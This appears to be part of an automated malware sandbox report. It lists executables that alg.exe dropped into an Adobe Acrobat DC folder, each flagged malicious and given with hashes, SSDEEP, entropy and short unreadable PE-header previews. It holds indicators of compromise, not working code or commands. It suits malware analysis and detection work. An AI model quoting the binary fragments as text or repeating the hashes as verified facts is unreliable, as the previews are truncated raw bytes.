                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......C.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1180160
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.084801589582246
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:kWyXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:kTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:2D3BEF40A8DEC0753C9FD81FE09CCAEE
                                                                                                                                                                                                                                                                                                                                                    SHA1:5DF8E2686CD33AADBD634574C955DA09489E72F8
                                                                                                                                                                                                                                                                                                                                                    SHA-256:B244A34B9C54BAF5E87C1DF5C13C1248FF9D36927E485412EF34D4A83958C8A6
                                                                                                                                                                                                                                                                                                                                                    SHA-512:F2B88AB280FB3968516667ECDA53BE9DA7A393A694752A7CDF13ECEB78D09B5D7318ED32AECB97FBA4EB43F94F1E2492115E0D6F372319B03BD0C89E5B850F5F
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@............ .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):6210048
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.386711523045074
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:iDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXO:TnN9KfxLk6GEQTX5UKzNDZD527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:D1F0E05EF51AB299EFADFB366E4F33FA
                                                                                                                                                                                                                                                                                                                                                    SHA1:2758306C3ACA4C73B006A270308D2A41BE7FD15A
                                                                                                                                                                                                                                                                                                                                                    SHA-256:9A0B7A7735E41D4C6B1887EEF818323F42F5EE0719C4986276345FEAC977F1F9
                                                                                                                                                                                                                                                                                                                                                    SHA-512:6FD1637991A6E000881398428619CFB454E6CCC268914F94AF3F986395A6B10A1A6F27A1ACC90AE53397E293570608A4C2AC8A293506CAF4A0B39C613A01CF6A
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......<_... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1157120
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0414752757267385
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:27Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:27sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:7054C58211DB2494183184787FB0A8BD
                                                                                                                                                                                                                                                                                                                                                    SHA1:8638760276A202F619263D5CEF95ACA1CD33B1B2
                                                                                                                                                                                                                                                                                                                                                    SHA-256:57E3D9ADB287181E6760A0CA215C9060D5FFBCB1C13BF581AB66534EA4B446F0
                                                                                                                                                                                                                                                                                                                                                    SHA-512:FA4A301A6BA276CCADCFAE452BF72C83B89FA0581B5B42EB8E0415BBDE80FE0368293733A228281CF48A45D9BB830A437059C41A27CDFA4B7E5F1D9A71AAB625
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12039168
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.596681044642841
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:98304:sb+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgK0D527BWG:+nPgTHIwZoRBk9DdhSUEVIXgK0VQBWG
                                                                                                                                                                                                                                                                                                                                                    MD5:93E12BA7E8E47363FEF7DD1290224756
                                                                                                                                                                                                                                                                                                                                                    SHA1:10DE7292460418F1D4AECF4E96BADF934FC4CC7E
                                                                                                                                                                                                                                                                                                                                                    SHA-256:2C7F48F2A33EB6D30D044600AB85F7C3837A5040EAD9A05E2BCF4B640601C0B7
                                                                                                                                                                                                                                                                                                                                                    SHA-512:D49C1ACE001C0D39DDD0AA95DE4C85F7C7EF6E5E09C36EF91436B5E653DBA8B6579DCB190E43B3C9984A5BE3E3E35C9E62C4B5D56FA9E0E44D394AA6A301AE2D
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@....................................;..... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1322496
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.281818418116841
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:9g5FvCPusYsqjnhMgeiCl7G0nehbGZpbD:qftDDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:CD965CC4AFA08EC9DCA3CF5C7648BE15
                                                                                                                                                                                                                                                                                                                                                    SHA1:D26869EA3399CE1A11F693D3FA8B47127B124018
                                                                                                                                                                                                                                                                                                                                                    SHA-256:0E9899E8BC0D83B16252CF1854D2D2D51195EA32BF1E166B93A358C0A0E9CA9E
                                                                                                                                                                                                                                                                                                                                                    SHA-512:DC29D9E98641326C563B44B8E628831768852F0168B811C161D292888D3E8A4BCE1F57FBD56A7019FDCCAA60912C0C4B2325521EEB0103D4F174C464BED31FDD
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p............ .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1339904
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.208904595543995
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:yjKTIsAjFuvtIfmFthMaT5U8aChaeu+sqjnhMgeiCl7G0nehbGZpbD:yjIMmPh7TT79rDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:AB72D75877E347EE52B7FE15C8B0071E
                                                                                                                                                                                                                                                                                                                                                    SHA1:53654A4FA23DDFF4AC8DEBDDF13617E4C1845D42
                                                                                                                                                                                                                                                                                                                                                    SHA-256:6E68BF4F633FBB1B4CE4DF44924DE6AD243F03B2B9C54828AB79DDCD2AE22635
                                                                                                                                                                                                                                                                                                                                                    SHA-512:0AC3349AE31B34B4CFC0DFB2F413EFBF7EB3E5F454EEA827EE6BDF18743991F19226E5CA23CFD31F8DA17566137EADD74FCCCC8175358287112DB4465CBE3C71
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$......2.... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1515520
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4117823093285535
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:IGqVwCto1Gm5WgisqjnhMgeiCl7G0nehbGZpbD:1Z1GmUJDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:D7B5FF4EDDBA951921A1E90FA7CFF0CB
                                                                                                                                                                                                                                                                                                                                                    SHA1:BBADE83AADAC25DD838A40840599D5E0B2C0BE11
                                                                                                                                                                                                                                                                                                                                                    SHA-256:77BF2C2A8635C8F833E3227163E5AECBDFFEBE403BD5BD0097BE6EE1400981E3
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C430BB83DFA30B0722B299C2D9ECE23C88D3C4E61013AF7371E38EF3D284566C2E25F7D3BEEDE92C116D311FBC36F838AA7E445C811EA9C7CE63046D8527B350
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@.....................................+.... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1253376
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.157413738618747
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:iWBWeXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:iWBWesqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:A08492763E07C7F7B57FD1F172FA536F
                                                                                                                                                                                                                                                                                                                                                    SHA1:EDFF949E007276FA7C3B3DD5E2239536E153899F
                                                                                                                                                                                                                                                                                                                                                    SHA-256:2848E2B1F82214640E213574DF69C3D96BA218F12EB24622CFC61E97359FBD63
                                                                                                                                                                                                                                                                                                                                                    SHA-512:8E572ED55417BF9FE2B125F9E2D7600A24DDCF87706372B31B11CB86C83F28B680B8B440B1BC3864211924AB0CBB03814E24D72173925900F9EB47080CA4A6A1
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`............ .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.228506490026996
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:Yf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0hsqjnhMgeiCl7G0nehbGZpbD:Y+GtCi27mVTyT+a01Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:ADB7A4E816746A3192D1E4ABBF62AD6C
                                                                                                                                                                                                                                                                                                                                                    SHA1:85356C98C64E66FDECB57B1921F17C4B88ADF4B5
                                                                                                                                                                                                                                                                                                                                                    SHA-256:EAB28BC7D03F94E795471937BA5F903CAAF0D9DC75C36FB3F887DF98031B4CC1
                                                                                                                                                                                                                                                                                                                                                    SHA-512:16B4F88A5030D0FC6B2CD3F153A44847ED9AB9CEE89D86E64DEC151B5F8182F94FAD0FDAFCDA59CD280ADC9CDE1F4DC8750DA7B7583577F9C4FB1E62A0F0669B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@....................................V..... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3110912
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.649669731793724
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:wU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYuDmg27RnWGj:R2NfHOIK5Ns6qR94D527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:B6126E0935004AC535FC1E223F3CAF0E
                                                                                                                                                                                                                                                                                                                                                    SHA1:3BC2D76C3497F3BF49F26C77E99A6D61F9B495B7
                                                                                                                                                                                                                                                                                                                                                    SHA-256:6432C128FDFE51588159DB6132CED87508DC77AA799ADCBEE80CA0E68C7C057D
                                                                                                                                                                                                                                                                                                                                                    SHA-512:8380A6BA9796CCDE698EA57A783B1A8441680B2648E35957BCAC57DD510EA0B2ED337D2D1D0B28CEC19FEDB877C7DCCDF397BE322E92B6F3E621532ED7D5BD31
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......./... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1588224
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.531931340032479
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:IkcWTUQcydSsqjnhMgeiCl7G0nehbGZpbD:IhKUtDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:A5F6BDFE42B0EE95F5AFF9A957612817
                                                                                                                                                                                                                                                                                                                                                    SHA1:323805CCB29CEAE1945B9D7634A8F47828F66C04
                                                                                                                                                                                                                                                                                                                                                    SHA-256:D522E29E041FDD123FB0C2B4EBD10451F37E80E29D2469EDE264EA71A075727E
                                                                                                                                                                                                                                                                                                                                                    SHA-512:FA02828C2441C34BC6E8272017B4DBA7BDBD8E34AA32C5B5512AAE1999A6356E184E5C31137D654515D94A8135E25EAD0CBB0BE9AAA090E506B8042D89012590
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@.......................................... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1338368
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.352660719285533
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:+fY+FUBxXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+A+qBxsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:ADC9453771970D13FC9008207ADA8CC0
                                                                                                                                                                                                                                                                                                                                                    SHA1:AE4397FAAA173925BA5B5C7663D0FBD9292EBB79
                                                                                                                                                                                                                                                                                                                                                    SHA-256:32B877C103440A623E5716292468EB3D4964A6B9B044996D6B1AF8B4954A8186
                                                                                                                                                                                                                                                                                                                                                    SHA-512:5E4097881FF9835D6FC9B548E423DDCBA4923C9AA0B33B77AA2230B500BE7A170D2ABA5C0C42A0AC26E9F0F5D9871D880F3AE411DD4AEB23F77D129CCA51A251
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@.................................SO..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1143296
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.022667349271153
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:KXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:KsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:ABF15912E4DE786DBA2508C829972746
                                                                                                                                                                                                                                                                                                                                                    SHA1:55412FF536158F77929D0D757AE8373FF8181A3A
                                                                                                                                                                                                                                                                                                                                                    SHA-256:FB21685BD1766FA444AB87E3AA139E7CDEF7A4B1F2FC780CA4CEAACD00BF372B
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C2AD016D76DD4E3772224342FC152D1F4D4641EB846CCE7269F17EDDE088262B5F28775CAA5442C11E20FC4BAD6ECB9443FF2A3939E102EF1E31288509801BFA
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@.......................................... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1161728
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.047155139786877
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:+lXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:usqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:990282B8462FD514A938283673AC5B24
                                                                                                                                                                                                                                                                                                                                                    SHA1:10A9EF9264A80F710283A20B25581A9147DED69B
                                                                                                                                                                                                                                                                                                                                                    SHA-256:124E12FFFAD85A88A92266C0EE860334E04F76E801476CE37765A3791AFF70AF
                                                                                                                                                                                                                                                                                                                                                    SHA-512:0FA7AC27907AF3928B86B4E9D8DA7363750E6C07BE903792B5C5CA20CF566EF3EFF2C377039221276752FA7E45AECE8A43BED6A6C9BBD0BA20D90304F4BBC9CC
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
